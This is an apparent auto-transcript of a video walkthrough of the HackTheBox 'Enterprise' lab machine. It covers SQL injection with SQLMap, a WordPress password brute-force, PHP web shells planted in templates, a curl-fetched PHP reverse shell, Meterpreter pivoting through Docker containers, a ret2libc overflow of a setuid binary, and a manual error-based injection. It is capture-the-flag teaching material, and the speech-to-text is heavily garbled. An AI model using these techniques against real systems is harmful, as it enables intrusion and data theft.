HackTheBox - Enterprise

IppSec · Beginner ·🔐 Cybersecurity ·8y ago

Key Takeaways

The video demonstrates a cybersecurity attack on a HackTheBox - Enterprise system, exploiting vulnerabilities in WordPress and Joomla to gain access to the system and ultimately obtain root access. Tools used include Docker, Burp Suite, SQLMap, and Metasploit.

Full Transcript

what's going on YouTube this is if SEC can we do an enterprise from half the box which is one of my favorite boxes because it uses docker and forces you to pivot around and I just love having to do that in these boot to root type challenges there's a lot of red shirts to go through to get to the captain and well that is fun the Box starts off with doing adder bus to find the source code of a wordpress plugin that you can use against a wordpress site once you pop the WordPress site you find out you're in a docker image and you just grab a bunch of passwords you can then use those passwords against Joomla and once you exploit Joomla you find out you're still in a docker container but there's a path from that Joomla server to the host and then once you're on the host you'll find a set UID program they can buffer overflow but even that buffer flows not too difficult once you take a deeper look at it so just a lot of small things to go through to get root nothing overly complicated that we haven't really covered before in videos but chain them all together it should be a good time so let's jump in to start things off we're going to do a and map so - SC for default scripts as VM reversions Oh a output all formats over in the directory and map and call it initial and the IP address of enterprise which is 1010 1061 looking at the results we do see a few ports are listening ssh is listening on port 22 it is a Ubuntu host it says and then we have Apache listening on port 80 443 and 8080 oddly enough we do have different flavors of Apache listening on the ssl port that is 443 Apaches saying it is version 2 4 to 5 and then 80 and 8080 has 2 4 1 0 and the non SSL ones are also saying there are debian host while 443 is saying it is a Ubuntu host so this is a bit odd I'm guessing that this 443 is tied to this SSH because they both report as Ubuntu we could probably take this Apache version and go look at what Ubuntu it was packaged with and get that it is Ubuntu - 10 and assume more that this is the more important server as a more edge because it's also listening on SSH can't guarantee just an assumption we do have a SSL cert on 443 obviously and it's common name is Enterprise dot local so we may think that the hostname of this box is Enterprise local but let's go and check each port out and see what they are because 80 says it's WordPress 443 says it's the Apache to default page and 8080 says it is Joomla so go into 10-10-10 61 we get something weird let's just go to the other ones 10-10-10 61 port 8080 and then HTTP 10-10-10 61 we can look at the certificate on 10-10-10 61 because we already know it is enterprise dot local but let's check some other information now to see if we get anything else just scrolling down we do see a email address jean-luc Picard and enterprise dot local so he owns this box I could say he owns the enterprise this is interesting because this could be a user name especially because this one is tied to SSH so maybe jean-luc Picard is the SSH user if not that may try him in Joomla and WordPress so just searching through the rest of these I don't see anything else but I am going to change my host name for this to be enterprise not local to see if it brings us to a different page so we go into a host file and do ten ten ten sixty one enterprise dot local and now let's see if they have virtual host routing setup which would bring this to a different page does not appear to be the case as we still just get the standard Apache to Ubuntu default page Joomla nothing too interesting we do have a few post-click here see if we see any authors to get other usernames I don't see anything that's sticking out right off the bat and then this which says it is WordPress but it looks ugly so the press control you to go into source key view and we can see what the issue is all the links have the I think they're absolute links or whatever they include the host name Enterprise HDB and uh box doesn't know what Enterprise DHCP is so all these links are dead so if we look here's like a image of course we near the box as 10-10-10 61 slash Togepi content but this is saying enterprise so let's also go back into a host file and change this to enterprise htb and then refresh the page so it looks like now this page is looking better we get the image things still look a bit out of whack so I'm going to clear my history and just get rid of all the cash that could have happened so let's refresh this page again and see anything okay that's looking better so whatever you do there's DNS things it may be a good idea to clear your cache refresh here verify so everything's fine click on this post we do have a user here William Riker so we know to potential users jean-luc Picard William Riker and the odd thing is WordPress is going first name dot last name in the SSL cert we had just had the full name it's a bit of a pain to get here subject so maybe it's jean-loup and then dot Picard could be the username so kind of just piecing things together as we're going through this box but have a lot to do so let's just set up a bunch of recon before we go poking at anything else so rename this window to recon and let's begin the first thing I'm going to run is go Buster and I'm going to do that against the Apache to default page so when do op go Buster do dash H to see the flags - you HTTP s 10-10-10 61 / - w-4 word list user share word Lister buster directory list - 3 medium invalid certificate and looking back we have - K - skip SSL certificate validation and that's the same flag as curl uses so it's easy to remember and then while that runs let's do another one let's start with WordPress so I'm gonna use Doug P scan and we're going to do - you for URL that's just gonna be 10 10 10 61 may want to put HTTP then when do - - enumerate I'm gonna do pt you TT I'm just - numerating whole options and I don't know what the output is so I'm just going to pipe this T and do Doug peace can't log okay the next thing is let's do Joomla so I'm going to use a program joomla vs and that's written by Rasta Tang who created node so opt joomla vs look at the options i do - you HTTP 10 10 10 61 80 80 - a force can all don't see an output so let's just t-that off - and the reason I do that is because Jim scan if we look at it is pretty out of date so let's go here and three days ago commits I swear this has been years since it's been updated but no yeah 2016 then 2018 so someone just recently started updating this so I guess let's clone it and see if James can does anything today I learned git clone see it's Perl script so I could just once - you know fights that - James can't log so let's begin with the first thing we did which is the dirt Buster we do have slash files on the HTTP so let's go over there check out what the files directory is and we have Elko zip so let's download that it's got an SSL problems we'll add - Kay unzip it and go in the file so Elka's PHP we see the author is Geordi LaForge which is a nother person and just because of the naming schema we have from that WordPress thing I may guess his username could be like Jody doc the forge again just guessing user names based upon the format we previously saw and we see he has comments need to create a user interface finish the date database interface as a typo on finish fancy the database interface any needs to make it secure so let's take a look at L cars DB post and we see the standard my sequel connecting stuff at the top if query is set then get query and pass query directly to a sequel statement and then run the sequel statement without any filtering sounds really bad but we do have this int right here so query has to just be a integer which makes this a lot harder to exploit because I don't know how to do the sequel injection with only using numbers so this may not be vulnerable DB dot PHP and it could have been vulnerable if there was like a sort by or something there but just where pairs name equals I don't know how to attack that looking at the other file though we see that standard sequel stuff at the top again is set query but this time query doesn't have int and then we have select ID from WP / swear post name equals query and that is slightly different than what we saw before so let's just open these up side by side them cuz deep why are you showing me that's odd oh except two in the directory doc Oh cuz DB post and we have this one that selects post title from WP post where ID equals a number this is select ID from WP pers were post name equals query so that's post title this is post name so doesn't really make sense on why this vowel exists except just to throw you down a rabbit hole I was thinking that this query you could do like one to get the post name and then use this query with the post name to get something but even if we did we're gonna have an issue because this is broken PHP code we have result equals DB query SQL this is not a string he really hate visual vim with the mouse hey get the mood oh there we go but this is not a string so when we echo it it's going to have a problem if we go to the other script that isn't injectable we have this code which takes that object and then fetches rows to turn it into a string and echoes just that row so this we're we're gonna have to do something creative to get this to print out because it's not a string and this echo commands going to break if there's a valid query and we can show that when we go to exploit this I spent a lot of time explaining that hopefully I did it justice but we're going to exploit this manually at the very end of the video and we're gonna use SQL map very shortly and when we explain it manually we're going to use Python to create a pretty cool program target is not alive yeah it is HTTP 10 10 10 61 80 80 try it again so let's look at the output of WP scan we have 14 vulnerabilities this yeah it generally requires a plugin to do something that's vulnerable this WPD be prepare so I don't think we can really exploit this if we don't have a vulnerable plug-in open redirect not really useful path traversal and unzipping it sounds like we have to be authenticated first path traversal and customizer again probably have to be authenticated cross-site scripting generally aren't CTF things because there's probably not a user here to hit with cross-site scripting host header injection and password reset we can test if that is valid really quick if we go to the WordPress page and see if email is configured I think that slash WP dash login dot PHP lost your password test at test comm may be registered but email is still probably not set up here so if we had run into problems we may fall back to this one and see if email is indeed set up generally I heard one to pull off in CTF just because again it requires male WP DB prepare yeah and if you're curious what this is there's plenty of links to go read about it is really cool again probably quite as a phone plugin authenticated javascript file upload we don't have credentials yet so we can't take advantage of that feed xscape probably gonna be cross-site scripting related new blog user key we caching I don't know what that is cross-site scripting into auto service so I didn't see any like SQL injection remote code and execution things that really stick out to me so I'm gonna keep going asking Matt that's cross-site scripting again and now we're just getting into the username so Doug please can gently bring us that much but hey they found the host this time but we know let's see I think it's WP dash content let's see it can we go to burp and see what plugins maybe target enterprise our HT be don't be content I think there's a plugins actually under that so plugins and then let's guess L cars that probably exist because if we put random drunk not found so what was it L occurs underscored DB dot php' this is it and we'll say it failed to read query because if we look at that script if query is not set failed to read so we're gonna change the query see it's B let's go back here and get a post name yeah yeah yeah this should be a person name nothing and the reason why we've all right to put this in quotes because this sequel query if we had where post name equals and then we just do or was it a AAA SQL is gonna error we have to put this in quotes normally the script is going to do that for us but in this case it doesn't and that's why in the one equals one you'd only put a quote to begin with because you got to escape the quotes the script is putting so don't have in there we can try lowercase no let's just put the number one to see if we get lucky because integers don't have to be put in quotes and we get this object of class my sequel MySQL I result could not be converted to string on line 16 if we look at that line 16 is this echo result and the reason is this doesn't have doesn't return a string we have to do that fetch thing that we saw in the other thing so the way you exploit this is force sequel to return a error message and the error message is a string and again we're going to go more in depth at the very end of the video but for now we're just gonna do the script kiddie way and sequel map this box because it does take quite a while well it's not trivial if you're not used to sequel injection so let's turn intercept on refresh this config myself to go through Bert send that to repeater send that to repeater there we go and then we can copy the file and a prize and this will be Elka's DB dot request okay SQL map - R if you get out that L codes directory SQL map - off request L car underscore DB dot request and we can do - - DBMS my sequel because looking at the scripts we did see it using my sequel let this run make sure it's running and then we will check out a recon says it is injectable so that is very quick we won't even look at the Recon we will just have this going wild come on it's testing for all other things get query is vulnerable do you want to keep testing others if any no and now we're just going to do - - dump to begin dumping the database so let's look at Jim scan while that dumps we have 10 10 10 61 80 80 the host header is running Joomla 375 from admin manifests and that gets found let's see if I can remember this path that's slash administrator last file / Joomla dot XML no I need manifests I'll shoot many FS that should be it turn off and we have the extended version that's three six here that's a lie if we go down 375 is the actual version so that's where joomla vs is pulling it from so it didn't find any vulnerabilities let's check jim scan version 375 joomla core is not vulnerable admin finder found the page to login to joomla and didn't find anything interesting let's go back to sequel map it's still running so what I'm going to do is let's start off to doorbusters and I'm gonna move gem scan log do documents HDB boxes Enterprise and let's do opt go Buster and then - you for URL HTTP 10 10 10 61 - w user share word list der buster directory list three medium will just copy this paste we're not saving the results anywhere t WP stop go that log save that do it for Joomla 8080 T Joomla blog okay let's check SQL map it is still going so it's taking a while to dump this database let's see if we can get any information out while it's going LS SQL map output enterprise don't nothing looks like I have an SQL map from another session so what that runs we're gonna cheat and just look at the dump I've done previously okay so this is very ugly it is a dump of the dirty post and instead of using them I'm actually going to use less - capital s to disable the word wrapping and now I can just do left and right to go through because if we looked before I have a harder time reading this than I do this so let's see we have the ID the GU ID which is the URL it looks like paying to paying post date first name post title pad we just have a lot of stuff instead of reading through this we're just going to search for a password and we can see we have a few signs so we have some HTML HTML just text needed somewhere to put some passwords quickly and then he starts putting passwords so let's start copying these to a text file so we've got that one go down so we just got that let's do Enterprise and CC 170 got another one here this looks like it may be the same I don't know that is different got one right here so we have four different passwords and we do know that William Riker is a user so and do duppy scan again and if we look at the options we have a way to brute force users so I'm going to do Doug peace can - - URL HTTP Enterprise htb - user William Riker and - W I think for waitlist it was as passwords file does not exist it does so I'm guessing Doug V scan isn't taking my current directory so I'm just gonna run PWD slash before passwords and that specified the absolute path see HTTP Enterprise dot h DB that is running WordPress to knock this over with goo buster nope let's just do the IP Oh God I have Doug be scared of you scan dot log there we go it's just a she'll sweat just ran WP scan okay that works let's look at the help I bet it's like - - for user well let's see yeah - - username okay it helps to read sometimes and then - - word list see what this returns it's running through everything it may have been faster just to attempt to log in there we go brute-forcing and it found the password for William Riker so let's log into this going back to Firefox let's do slash WP - log in William Riker and the password I pasted that right yes it's just taking a sweet time it's good recon I want to kill my Co Buster's maybe I'm slowing down the server we do have a few things that we didn't see like Joomla has slash files / 0 / 1 by one but I just want to get WordPress locked in there we go that was an unusually long amount of time so the first thing I'm going to do is see if we can write to the files on this so I think it was apocalypse that we did a wordpress one so if you want to learn more about WordPress go to that video I'm just editing a template file and WordPress which has PHP code so we can execute code so let's see let's do the header so we're adding the header and we can put code so let's cat up shell PHP CMD dot PHP I'm just going to copy this super simple way to execute a system command and then we're going to update the file okay so now if I do question mark eps x equals LS or is it just it so epic just it we can look at the source and we do have the output of LS I only enough there is a sequel shell dot PHP so but let's see let's go for a shell so let's do which and see to see if this is on the box it doesn't look like we have netcat so what I'm going to do is let's open a new tab we can go back to this one exit that exit and we can name this let's see WordPress I'm going to make a directory www and then I'm going to go to pen test funky reverse shell cheat sheet actually I have this in my box shell bhp pH for your first show dot PHP I think this is actually part of Kali to see what this else exists yeah there's it's all over the place at least on my box user share Laura Nam PHP / shell this is what I'm doing so let's edit this file the IP address 10 10 14 for what is mine I am 10 10 14 six eight thousand one is a fine port and I will run Python em simple HTTP server on port 80 go back to here let's just send this to burp to make life easy we can change request method which cool is that on the box it is so we can do curl 10 10 14 6 PHP reverse shell dot PHP and we can do NCL VMP 8001 instead of doing anything we just type that over to PHP so we're going to curl it's going to download all the contents of the script from a web server and then it's going to use PHP to execute that let go and we get a shell just like that I'm going to upgrade my TTY so Python - C import PT y PT y dot spawn and bash not found 3 doesn't look we have Python on this box user Lib Python 2 7 that's a directory it's a directory 2000 all yeah it doesn't look we have Python there's foul I must have been removed after install or something since these exist but definitely no executable file called Python so we can't escalate a shell so what else can we do I have config not found so we're definitely on something that is very stripped-down so when do i piay ddr this is the new way to do IP addresses and linux if config is deprecated it has defecated for a while so the IP is the new hotness we see our IP is 172 1704 which is different than the one we connect to it on which is 1010 1061 so i'm going to do i p neighbors this is gonna replace arp because our probably isn't on the box if if config isn't and we do see it talking to once every to 1701 and once every 2 1702 so 0 1 is probably going to be the gateway tour host 0 2 I'm gonna guess is the database server but we can kind of check that by going to ver dub dub dub HTML and let's cat the wp-config.php see we got the DB user as root database name as WordPress database host as MySQL but we do have a password NCC 1701 II so let's see let's add that to a password file don't need that anymore that is sequel see cat Etsy hosts and we have 172 1702 as my sequel so that is correct we do have weird things also if we look at our host name it is just a string of random things this looks like it is either like a LXE or a docker image name that is generated there's probably other ways to check if we on those but I'm not exactly sure how but don't need to I want to get into that my sequel database because we know the root password so we can do my sequel and it's not found so how I did this is I use this access to generate a metal shell which is meterpreter and then use meterpreter pivot so that's what we're going to do so we can save that close that this let's bring that down and let's split that window MSF venom - - list grab for a medal and the for Linux they had started rewriting meterpreter rebranding it to metal and then decided to rebrand metal back to meterpreter I think so it's called both but just scrapping for metal only shows the Linux ones and msi venom always takes a while to run I don't know why just want a list there we go probably should just save that to a file and grep the file no it saved quite a bit of time waiting so I want to do the reverse TCP and then MSF venom list format under the format' self you can do a command to list the format and get that but Linux follows exe is elfin Linux so - P for payload Linux x64 meterpreter reverse TCP we have to do reverse not mine - because my host doesn't know how to talk to that 172 address l host is equal to my IP which is 1010 14:6 heliport will say 8000 - and you gotta do - f4 format elf and - OH we'll call this MSF dot bin well that's going let's launch MSF console okay it saves the elf it is elf and on this we can do you name - a to verify a host is on 64-bit ok so use exploit multi handler set payload copy that October on come on I'm just waiting for it to order complete and then we can set L host 1010 14 6 set L port 8000 to exploit - J so we now got a TCP handler listening we can move MSF been to dub-dub-dub go there face on em simple HTTP server 80 on our shell we go to dev s hm I'm going to curl 10 10 14 6 MSF top bin and save that as MSF top in I guess so we have to make this executable with chmod plus x and when we execute this mission denied is executable is an elf dev a so jim has no exact so let's move to temp still executable listen dot Sam I guess poreless someone probably didn't clean up because that's September 7th around the time we launched the box so I won't go into that dot slash MSF top bin and we look we have meterpreter session 1 has opened and also this whole pivoting isn't needed because we are root on the database and you could have just dumped Joomla stable from WordPress but instead of just doing - - dump - all and sequel map I figured it's more beneficial to show pivoting so now we have meterpreter session 1 open we can do two things we can just do sessions - I 1 to interact with it and do port FWD 3 - help it tells us the thing so we can do ad indicate a reverse for port I think that's what we want to do so we want to do a reverse port forward we want to listen on will say 8003 we want to Ford - port 3306 which is my sequel and the hair is going to be once every two 1702 I believe we just add like that okay a local port remote host and a remote for it oh I think I said - go and type - P so now if we kill local host 3 306 now we listened on eight thousand three - OH we'll call this temp we get a my sequel prompt so we could just do my sequel - H local host 8003 - you root - P the password is this unknown my sequel server host sequel - h-help I don't know the command option foot port is it - capital P not sure there is a way to get my is equal to go to it through that port but I just don't member off top my head how I normally do port for words is I just do use exploit Multi Hamlet no search socks we can use auxilary server socks for a show options that's good well listening on port 1080 can run that then we can go to V at sea foxi chains verified that would have proxy chain setup for socks for on for ten eighty and then just on proxy chains my sequel - you root - P - H and 172 1702 password I think I took that off my clipboard Oh connection refused 105 the port wrong foxy chains curl 172 17 0 - 3 0 6 - OH temp - couldn't connect odd split this let's change this port 8000 for n CL v NP 8004 start Python let's get another shell sometimes what you think everything's just going to go well and it doesn't ok 172 17 at 0 2 it is reachable Oh God we're out ad 172 1702 was here 0/24 1 so we have to tell Metasploit to route stuff through that session I know it's forgetting something now this should work there we go now we're on the box so don't forget to do the route ad so we can do show databases and we see Joomla Joomla DB WordPress WordPress DB so we could just now use Joomla show tables it's empty use Joomla DB is routing all the tables show tables and we have a lot of tables so let's go up here and I guess search for user so I'm guessing Edie z2g users is the table with user names so I'm going to use so now describe that table Edie z2g users and we have ID name user name email password so we can just select ID name user name oh if I don't need email password from Edie z2g users and we have two users the Super User is Geordi LaForge and then we have Coonan could try to crack these hashes but before we do let us just mainly try logging in because always could send them over to a cracking rig and try to crack it but with only four passwords we've gotten so far let's just do it manually it's taking one respond is broke on intercept it is indeed so Logan name let's try a password again not it copy the next one whoops don't have my clipboard so let's copy this well again and we get in so we are now a super user on Joomla so we can do exactly what we had just done with WordPress but for Joomla and I'm trying to remember exactly where to go to edit a template I'm guessing templates if we go here see edit templates this what's page look like sweet index dot PHP and let's just add a shell at the top of this so PHP see MDE PHP save and I'm just gonna go into repeater and we're going to change this to be port 8080 see we can close that we don't need that session anymore that's fine let's just rename this to Joomla go into w w v PHP show save thousand four and we can just do Python simple to be server run this get a shell and now we have access to the Joomla server so let's go into dub dub IP addr once i've you 1703 IP may four neighbors and still just talking to the two boxes so it's odd I remember from my dirt Buster a long time ago we had a files on Joomla so let's look at that and we don't have to do by same walk because we are literally on the box and we have L car zip on the Joomla box and that looks like the same file we are downloaded from HTTP so we can md5 summit and b5 some old cars zip and that's that same exact file let's see anything here so that looks odd I think we got the follows directory and a few others with their own mount point let's go over the wood press box I closed out of that so one of its like that here I have to exit this kill one do I get my MSF in back I don't get the show back eight thousand one hold on PHP over shell eight thousand one startup I'm going to do this a few times I just can put this a new one what eighty okay rename get shell boy press rename get shell Jim wha go okay it is wait this is joomla now okay we do have a bunch of like verb dub HTML is specifically mounted but the district in joomla is we have a slash files and if we remember as i said if we went to enterprise dot local flash files we have the Elko zip so see let's touch hip sack refresh and we get a file on HTTP and remember if we go back to the end map scans this one 443 is listing a different version and most likely has SSH listening as well so let us drop a show there echo we can just do the same thing we've always been doing so CD www.h be reverse shell do port 8000 5 + - m or an use that's fine cool 10 10 10 61 PHP reverse shell dot PHP I want that to be where - cool 2005 oh I'm trying to save this crap it's not found where am i listening should've found wait oh I don't know what I was thinking it's late it's almost 11:00 cool 10 10 14 6 / PHP reverse shell dot PHP - OH PHP we'll call this just if Zack PHP okay refresh this page and we do have EPS at PHP and to keep things a bit cleaner exit this go to new one and label this enterprise hope if I listen on a port and I cat that go and we get a shell if we do first name I'm still in docker I think dub dub the HTML now I'm on WordPress that is odd did I actually click go there Enterprise dot local hip sec I think I clicked go on burp intruder and just didn't notice guys now I am on the host and we should have place on which Python 3 yes I do so python - C import PTY bTW why not spawn and - got the type Python 3 will just copy and paste this okay background this sty is raw - echo foreground now we got a proper shell in this box and we can say terms going to be equal to screen and that should be fine for now should be able to clear term okay so now we can begin the attempt to escalate privileges because we own a host on a better machine and have a lot of IP addresses we can see that 10 10 10 61 address and we can see 172 1701 is a docker address so let us begin the enumeration so the very first thing is let's run a Linux enumeration script so I got to stop my web server there and we'll create a new thing here so CEW dub and CP lin Prive esque lynnie no mess h and we'll copy it here python m simple HTTP server eddie and we can execute this with Colt 1010 14 6 when imam got SH if you just Google Lin and I'm done SH github you'll find it so let's see go to bash and let this run stuffing a bunch of information well that goes we can change third to true if we want oh it is on thorough so I did make that modification I did in a previous video and just I guess doing cleanup is equal to one beginning so it's always gonna do a thorough / lengthy test so that could take a while let's just begin looking at what it's found cool there we go so we got the hostname the colonel compiled in 2017 probably shouldn't waste time looking for a kernel exploit if that's not intended because this box was released in 2017 I think it was but Ubuntu version 1704 use a group info weird dub-dub-dub data jean-luc Picard is logged in to TTY one group memberships let's see jean-luc Picard is a member of sudo so if we get access to this account we should be able to prove ask weird dub dub dub data and I don't think we're really a member of anything we can go into this directory so we could see if there's any sensitive files their files earned by user but right over my group this for that lengthy test Ward readable files in slash home nothing there home directory contents has the HTML so guessing this HTML is probably WordPress and there's mounts that are going to it's my both WordPress and Joomla in this HTML and then vertebra HTML has files and the reason for that is I'm guessing they just pretty much created a shortcut in the doctor on this box so the host machine can edit the files within dr. C Apache log nothing their shells nothing they're fast with stuff cron jobs nothing unique in the interfaces so let's back to we left off to 17-0 okay up history don't need default route don't need we do see it is listening on two addresses that we missed three two eight one two and five three five five so I don't know what those two fourths over but it did not appear in red map because we didn't scan all ports so that is something we should definitely look into running processes see let's just highlight ones by root perché not much there these permissions from the binaries above we can just ignore that that's unit D sure patchy directory su ID files let's see anything here we do have slash bin slash L cars with the set UID bet owned by root so if we exploit that program we can get ownership of this box so that is probably what we're going to have to do since that is a unique file so if we md5 sum don't have a show this box right now I think it died that's odd oh let's see kill three three eight two seven listen again go back here watch this again Oh looks like I lost connection or the box is reverting so I'm gonna pause the video to take a look at exactly what is going on okay looks like the issue is fixed my internet just went down for a bit so I'm gonna refresh this page get my shell again verify I am on the host okay let's do a real TT y y Rama echo for ground there we go so what do you say bin el cars and and page 64 - D hello cars not - D we just want to basics for it okay let's go to the very beginning very beginning and copy everything okay go back to my host LOL kirby 64 paste paste 64 - d and let's check the sums on the files looks good so we can begin a reverse engineering and i'm going to do that in a new tab actually so let's make alko is executable and then execute it and we have Emma bridge access code and we hit junk we just get terminating console so we could cheat and use like sis call trace on this file and then hit junk and we see let's see test maybe it cell trace I have that whole tryout race cars we see it using the STR comp with our user input which was just junk ASD and procured a one so if we heard a one actually let's get rid of that but you can see we got to the menu there so let's start /l because the curd a one so that's one way to do it if you want to use radar we can move in with our two held cars hey a to analyze functions and then I'm just gonna hit V V to get into visualisation mode and I'm gonna look at all the functions we have and I'm going to go on a hunch that says bridge auth is the function I want so I'm going to go there hit G and capital V to enter this mode where I can more easily read what's happening and at the start of this function we are moving bytes one byte at a time so P I see a rd a one move all those bytes and I think we're load effective address and I think that's where we're actually getting user input baby let's go up I'm not a hundred percent positive that may be it or it may just be learning all the bytes we moved I'm not positive but anyways we do have it doing a compare and then immediately a jump so one way we call may menu the other way we died so that's how you would do it over radar now if we enter L curse and a bridge asks code recurred a one we get a menu and what I'm gonna do is the lazy way to fuzz this let's give a Python - see print a times 500 get 500 days and we're just gonna throw them at these one at a time one did not crash let's see - nothing happened three that was odd we did crash on three it implemented something second a secondary route routines not implemented - in console segfault so let's try that again make sure we have a reliable crash it does see other ones for good a one for it just seg faults right away five terminating console so that was a graceful exit six I guess that's not implemented and then sevens exit so we have a buffalo overflowed potentially at option three and option four so now we have to go and look into them to see if any exploitable so let's launch gdb on L cars we can run it access code get a three base trip 500s and we get it exit normally so I could have swore we seg faulted before no it's just coud no just um Dave maybe I fat fingered it hit for the last time okay let's proceed to case for and see if we still seg fault run could a one no it's not what I wanted let's just run this for security code okay that's a sec fault so we do have a crash and we over wrote VIP so by far the easiest first thing is create a pattern create will do five hundred and paste this run this again the card a one for Anna now we can search for this pattern find offset to 1/2 so after 212 A's we have AE IP over right so we can verify that by going down here Python print a 212 then print one two three four B's so now EIP it should be all B's on this one more time four and we get all 42 Zandi IP so we know exactly where to overwrite so let's good new thing them buff PI P overwrite at 212 okay and while I'm at it we can make this smaller and that looks more comfortable the next thing we have to do is a check sack and see what compile time options are we do have Canaries fortify and depth disabled but we do have pi the I was gonna say what it stands for and then it just came on the tip of my tongue it's essentially a SLR but we need to check if a SLR is enabled on enterprise so we can do that in I forget exactly where this is pro we find crap random what let's do this No okay so we can do that so we can cat proc sis Colonel randomize VA space and we get a 0 so SLR is disabled on this host we can further verify that by doing LD d then Elka and grep for web C and if you watch my other videos when I did this on machines that had a SLR this memory address will change every time but Lib C is being loaded in the same spot every single time which makes or exploitation very easy so let's go over to our tab and we'll create a skeleton exploit so from pound import store context equals OS when X and arc equals 386 I think that's right then first port equals o the one thing we didn't do is net stat al NP graft list we went over this a little bit but didn't verify which port it was three to eight strike lose NC 10 10 10 16 four three two eight one two 61 there we go so we have it running on the server on that port we can check five three five five don't know what that is we can find out after we pop the box put the port three two eight one two so ten ten ten sixty one three two eight one two and the host needs to be in quotes okay and we need a junk so we can do that is x94 it not doesn't matter it could put anything there could put a Spees whatever and we need to do the ret to Lib C equals P 32 we don't know this address yet that's going to be system we need a exit call and we need this doing Sh a payload is going to be jump + ret - websi combine those and we need to do the fun part so ODOT receive until and we need our dots and line first one whisper card a1c has to procreate a1 we sent a four and then i think we sent our payload so now we're going to get what there is receives er so NC ten ten ten sixty one three two eight one two and a bridge access code this is card a 1 waiting for inputs the next one and after that enter security override that is our buffer overflow and after that our interactive that should be good let's go here we're on the box we can do GCC on L cars not GCC gdb on L cars long day and a bridge access code we don't actually need that we can just control c2 background it and having a full PT y is really awesome so we can do this we want to print system that's the address we want waiting for input up here we could put the same thing for exit because it doesn't matter but we'll just be kind and put the correct address and then we need to find a SH string so we will do find that system will go bunch of spaces ahead and we're looking for Sh for patterns where Sh is so we can try verifying this that looks good piece this over see let's see what i fat-fingered cuz there's no way I ever type anything correctly once oh it's just at the skin and try moving that or is not to find I need to connect all right equals first for it and it looks like it worked ID LS no we did not so let us look into everything and see what we screwed up now everything looks fine and I see the next error we need plus equals so I get for copy and pasting those lines and we have it we are now route so let's see we go to CD / root root text we could also darker images and see this box is indeed running docker so that is the box we will be now stepping through the sequel injection that's great what's hopefully a last pain and we'll name this SQL injection first things first let's analyze exactly what's been going on with this script so I said a lot of things early on this video but we never showed it so last say Chaz jean-luc Picard at 10:10 1061 type secrets super secret password of a that I changed it to and we'll see it OSU and wondering how I changed it well if you're following all log in this video you have route by now so let your imagination run wild let us do dr. images we want to get into the WordPress one so docker exact IT WordPress I forgot bash there we go go on WP content plugins Elka's and remember this Elka's DB PHP file we want to see exactly what was happening here so let's open up VI not found Nano not found well I guess we can cat this so we'll name this test dot PHP and then there's probably a more elegant way to do that cat command but there's a hundred ways to skin a cat and my way still works so base this and we're going to do echo SQL don't know if any of that quotes in PHP I don't think I do hopefully I don't we'll find out that doesn't look right but we'll find out get a new line and we want to echo get is it type of types I think tight SQL know we want result echo no I had just screwed up let's cap this file test dot PHP will paste this okay echo SQL echo new line that go get tight result hopefully it's not get types echo gosh n then we can paste the rest so if we go to a box see let's just do DP Enterprise HD be don't be content go equals one remember we got this object class couldn't return let's change this to test dot PHP view the source and now we can see the query we ran which is select ID from the first four person name equals one the object type it the variable type is an object so that's why echo failed it couldn't convert the object to a string and that's because we don't have that fetch result query the other thing I want to point out is what was it yay yay yay like that we just do this query returns boolean because it failed we put that in double quotes something is escaping our quotes which is odd because if we look at our code we don't have anything that's suggests sanitization but we do have a include statement so if we cap that actually before we do that the very first thing I would do would be info dot PHP PHP info and let's go to and fro PHP I would look at like safe mode if safe mode is somewhere SQL safe mode off I would do filter the filter flag is off so it doesn't look like it's any PHP config so that's why the next step would be looking at the script and that was a WordPress config script cat test we want to look at WP config if we have looked at this and analyzed the whole top we realize there's nothing there that does whitelisting but it does require another script to be RAM which is WP settings and if we can't WP settings and look up quite a bit see thank you before that we have add magic quotes and setup request for get and post and it's this function that is screwing us up so let's remove this real quick so just go up three directories said s30v magic will comment out with two slashes and this was WP settings so now if I go back refresh this there's no more escaping of the quotes and this now returned an object which caused us to get an error message so let's revert this so it's back to how it was I just want to show you some of the filtering WordPress may be doing so that's fixed then let's begin with the was a double query injection error it's a tough one to do in sequel injection so we're going to use SQL map a little to aid us and this will show you how to kind of troubleshoot what SQL map is doing so you can understand the injections when you use an automated tool which is pretty cool so SQL map - R was it DB elko is DB SQL map - sure I'll cause I'm scored DB will do - - dump all and we need to do - - proxy equals 4 which is 2700 180 80 this begins dumping we can go into burp go to a history and see all the things that's doing what's doing sleep commands No wait on the crack okay now we're getting to the actual dumping I guess there's trying to identify the sequel injection but this is what a double query injection looks like and the SQL map automatically adds a little bit of office keishon so it's a bit more complex than it is but it's still a relatively complex query the idea is by its default or not by default this is a valid sequel command but it uses a bunch of dynamic things like this count then you have this random function floor is essentially rounding and Rand is generate a random number and then you have group by and all those will create an error message and that error message will be the contents of this select query so that is exactly what sequel map is doing and we can kind of show this let's see does this query work let's send this in bad request I don't have everything make sure I get everything go I don't know if that is a valid one that's I hate how much randomization SQL map does get response basic search know everyone so let's see we will control shift you this copy this and we will get off WordPress and we'll do docker exact - IT my sequel I forgot bash again docker exact IT my sequel - and we need my sequel des yeux root - P and the password NCC 1701 E and we can paste this query in now we see that's weird there we go so we see the queries generating an error but if we had just taken off one of those things let's say this group by X and no longer generates an error and just generates junk so let's make this a bit simpler and just select the database name so we'll select count star and cat select version 4 think I type that right yes it did so we can take a look at what each piece is doing so if we do select count stir can cat select version I didn't take that one correct let's see select count stir we have eight counting the number of times five seven one nine appeared and five seven when I appeared just once and that is the version of sequel we are running so what we could do is add that for Rand times five and see what that does now we just have a random character at the end of that number as we see that one nine and then a digit is changing so let's add the as a from summation scheme without tables and we get that appearing 364 times if we remove as a nothing really happens it's just labeling the column so that version instead of being called the select statement it's called a and we can group by that of tables G and once we start grouping by that column with all the other random data that's where the arrow comes about and we can see duplicate entry four five seven one nine one for a key group key so if we wanted to actually extract data we can remove this version and we could do something like select first content from word press dot on the score of posts limit let's say thirty to one because I just remember this post content actually having data if we're selecting from something that has no data it's gonna be her to know if we succeeded so do this a few times and we don't get any errors and why is that see floor and we got to concoct one from something went wrong select one from select count there's content let's do mid 0-60 3 well now we're getting an error message but that's still not what we want the reason why I did mid is because error messages are limited to 64 characters oh we need one so at 1 to 63 Plus that random thing that is a 64 character error message so that's why we need the mid there we do 64 I'm guessing that one's gonna get truncated off yep so we no longer have a random number so the next thing to do is send this over to a browser and see if it will error out so query see what happens warning the Federation diplomatic quips are busy trying to bring an end that's good and again if we do 63 so this number the first number will it was one that's the number to start at so now we can get bring an end to the Dominion War this means the enterprise and a crew a so we can do what 127 and start reading even more this is kind of a pain to do manually an SQL map is doing that for us if we look at SQL map square we have select mid if null cast level 154 so doing 54 characters but let's start creating a 